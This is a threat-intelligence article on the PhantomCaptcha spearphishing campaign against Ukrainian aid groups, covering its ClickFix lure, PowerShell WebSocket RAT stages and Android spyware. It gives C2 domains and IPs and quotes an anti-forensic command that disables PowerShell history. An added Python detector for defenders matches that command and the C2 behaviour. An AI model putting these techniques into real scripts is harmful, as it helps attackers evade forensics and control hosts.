Researchers from SentinelLABS, in collaboration with the Digital Security Lab of Ukraine, have exposed a coordinated spearphishing campaign aimed at humanitarian organizations and regional government agencies in Ukraine, including the International Red Cross, UNICEF, and the Norwegian Refugee Council. The campaign, dubbed “PhantomCaptcha,” employed fake Cloudflare verification pages and weaponized PDFs to deliver a multi-stage PowerShell-based WebSocket RAT hosted on Russian-owned infrastructure.
“Threat actors used emails impersonating the Ukrainian President’s Office carrying weaponized PDFs, luring victims into executing malware via a ‘ClickFix’-style fake Cloudflare captcha page,” the researchers reported.
According to SentinelLABS, the attacks were launched on October 8, 2025, following nearly six months of infrastructure preparation. Despite this extensive setup, the malicious infrastructure remained active for just one day — a hallmark of strong operational discipline and anti-forensics strategy.
The emails impersonated the Office of the President of Ukraine and distributed an 8-page PDF purporting to be an official government communiqué. When opened, the document contained an embedded link redirecting to zoomconference[.]app, a fake Zoom domain hosted on a VPS registered to Russian provider KVMKA.
“The server response showed that any visitors to the site encountered a convincing fake Cloudflare DDoS protection gateway,” SentinelLABS wrote, explaining how the page disguised the malware delivery sequence.
The PhantomCaptcha technique expands on the ClickFix or Paste-and-Run trend observed in previous social engineering attacks. Victims were instructed to copy a “security token” from a fake captcha popup and manually execute it in a Windows Run dialog — effectively tricking users into infecting themselves.

The command executed a PowerShell script silently in the background:
This step downloaded the first-stage PowerShell loader, disguised as a captcha verification routine, and began the multi-stage infection chain.
“This social engineering technique is particularly effective because the malicious code is executed by the user themselves, evading endpoint security controls that focus solely on detecting malicious files,” the analysts emphasized.
SentinelLABS traced the infection process through three PowerShell-based stages, each progressively more obfuscated and stealthy:
- Stage 1: Obfuscated Downloader
  A 500KB PowerShell script (cptch) downloaded the next stage from bsnowcommunications[.]com/maintenance. Despite its size, its entire logic was condensed into a single line, hidden under layers of obfuscation to evade signature-based detection. “Using massive obfuscation to obscure simple functionality is likely designed to evade detection and complicate analysis,” the report noted.
- Stage 2: Fingerprinting and Encrypted Comms
  The next payload performed system reconnaissance, gathering the computer name, domain info, process ID, and hardware UUID. The data was XOR-encrypted and transmitted to the C2 server via an HTTPS request. “The script also disabled PowerShell command history logging via Set-PSReadlineOption -HistorySaveStyle SaveNothing as a means of evading forensic analysis,” researchers added.
- Stage 3: WebSocket RAT
  The final stage established a WebSocket connection to wss://bsnowcommunications[.]com:80, allowing the attacker to execute arbitrary PowerShell commands remotely, exfiltrate data, and maintain persistence. “The WebSocket-based RAT is a remote command execution backdoor, effectively a remote shell that gives an operator arbitrary access to the host,” the report concluded.
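The stage 2 and stage 3 behaviours above (PSReadline history disabled, a WebSocket client pointed at a TLS endpoint on port 80, the reported domains) are all visible in PowerShell script-block logging. The following is an added detection example, not code from the SentinelLABS report; the host names and script text it scans are constructed, and the rule thresholds are the author's own choice.

```python
import re
from collections import defaultdict

# Constructed sample records in the shape of PowerShell script-block log
# entries (Event ID 4104); hosts and scripts are made up for this example.
SAMPLE_EVENTS = [
    {"host": "WS01", "script": "Set-PSReadlineOption -HistorySaveStyle SaveNothing; "
     "$cn=$env:COMPUTERNAME; $uuid=(Get-CimInstance Win32_ComputerSystemProduct).UUID"},
    {"host": "WS01", "script": "$ws=New-Object System.Net.WebSockets.ClientWebSocket; "
     "$ws.ConnectAsync('wss://bsnowcommunications.com:80/', $ct)"},
    {"host": "WS02", "script": "Get-ChildItem C:\\Users | Select-Object Name"},
    {"host": "WS03", "script": "$c=New-Object System.Net.WebSockets.ClientWebSocket; "
     "$c.ConnectAsync('wss://updates.example.internal/', $ct)"},
]

# Rule patterns drawn from the behaviours described in the report.
RULES = {
    "psreadline_history_disabled": re.compile(
        r"Set-PSReadlineOption\b[^\n;]*-HistorySaveStyle\s+SaveNothing", re.I),
    "websocket_client": re.compile(
        r"System\.Net\.WebSockets\.ClientWebSocket|\bwss?://", re.I),
    # TLS WebSocket (wss) aimed at the plain-HTTP port is an odd pairing worth its own flag.
    "wss_on_port_80": re.compile(r"\bwss://[^\s'\"/]+:80(?:/|\b)", re.I),
    "known_c2_domain": re.compile(
        r"bsnowcommunications\.com|zoomconference\.app", re.I),
}

def match_rules(script):
    """Return the sorted names of every rule matching one script block."""
    return sorted(name for name, rx in RULES.items() if rx.search(script))

def scan_events(events):
    """Aggregate hits per host so multi-stage behaviour is visible even when
    each stage lands in a separate script-block record."""
    hits = defaultdict(set)
    for ev in events:
        hits[ev["host"]].update(match_rules(ev["script"]))
    return {host: sorted(names) for host, names in hits.items() if names}

def triage(events):
    """'high' when anti-forensics and WebSocket C2 behaviour co-occur on a host,
    'medium' for any single suspicious behaviour; clean hosts are omitted."""
    verdicts = {}
    for host, names in scan_events(events).items():
        both = "psreadline_history_disabled" in names and "websocket_client" in names
        verdicts[host] = "high" if both else "medium"
    return verdicts

if __name__ == "__main__":
    for host, level in triage(SAMPLE_EVENTS).items():
        print(f"{host}: {level} -> {scan_events(SAMPLE_EVENTS)[host]}")
```

Feeding real 4104 records in place of SAMPLE_EVENTS only requires mapping the event's computer and ScriptBlockText fields onto the same two keys.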
The C2 infrastructure was carefully compartmentalized. The primary domain, zoomconference[.]app, resolved to 193.233.23[.]81 and was active for only 24 hours. A separate backend, bsnowcommunications[.]com (IP 185.142.33[.]131), remains active and is believed to manage long-term control of compromised hosts.
The campaign exhibits overlaps with COLDRIVER, a Russian FSB-linked threat cluster, known for targeting Western NGOs and diplomats via spearphishing campaigns since 2022.
“Our analysis suggests this attack chain has overlaps with activity attributed to COLDRIVER, a Russian FSB-linked threat cluster,” SentinelLABS stated, though attribution remains under investigation.
In a related discovery, researchers identified a mobile attack vector operating from the same infrastructure.
A newly registered domain — princess-mens[.]click — hosted a malicious Android application named princess.apk, masquerading as an adult entertainment app from a club in Lviv, Ukraine.
The APK harvested:
- Contact lists and call logs
- SIM and device identifiers
- Location and Wi-Fi data
- Photo galleries and media files
“The application collects a variety of data to send to a hardcoded C2, which itself can be linked to additional infrastructure and samples,” SentinelLABS wrote.
The inclusion of socially engineered lures like adult content and fake cloud storage tools indicates an attempt to expand surveillance beyond desktops to personal mobile devices of targeted users.